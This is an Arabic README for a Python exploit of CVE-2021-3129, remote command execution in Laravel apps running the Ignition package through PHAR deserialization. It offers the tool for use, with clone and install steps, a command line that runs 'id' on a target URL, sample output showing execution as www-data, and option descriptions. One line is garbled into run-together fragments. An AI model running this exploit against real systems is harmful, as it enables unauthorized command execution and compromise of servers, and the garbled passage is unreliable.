
استغلال بلغة Python لـ CVE-2021-3129 يقوم بأتمتة إلغاء تسلسل PHAR لتنفيذ أوامر عشوائية على نقاط نهاية Laravel Ignition الضعيفة.
هذا نص برمجي استغلالي بلغة بايثون لثغرة CVE-2021-3129، وهي ثغرة تنفيذ أوامر عن بعد في Laravel عند تثبيت حزمة Ignition. تسمح هذه الثغرة للمهاجم بتنفيذ أوامر نظام اعتباطية عبر إلغاء تسلسل PHAR.
phpggcid، whoami، إلخ.)requestsاستنساخ المستودع:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
تثبيت حزم Python المطلوبة:
pip install requests
تشغيل النص البرمجي مع الهدف والأمر المطلوب:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
مثال على الإخراج:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target (مطلوب): عنوان URL لتطبيق Laravel المعرض للثغرة.--cmd (اختياري): الأمر المراد تنفيذه على الهدف (الافتراضي: whoami).--log_path (اختياري): مسار ملف السجل المستخدم (الافتراضي: ../storage/logs/laravel.log).
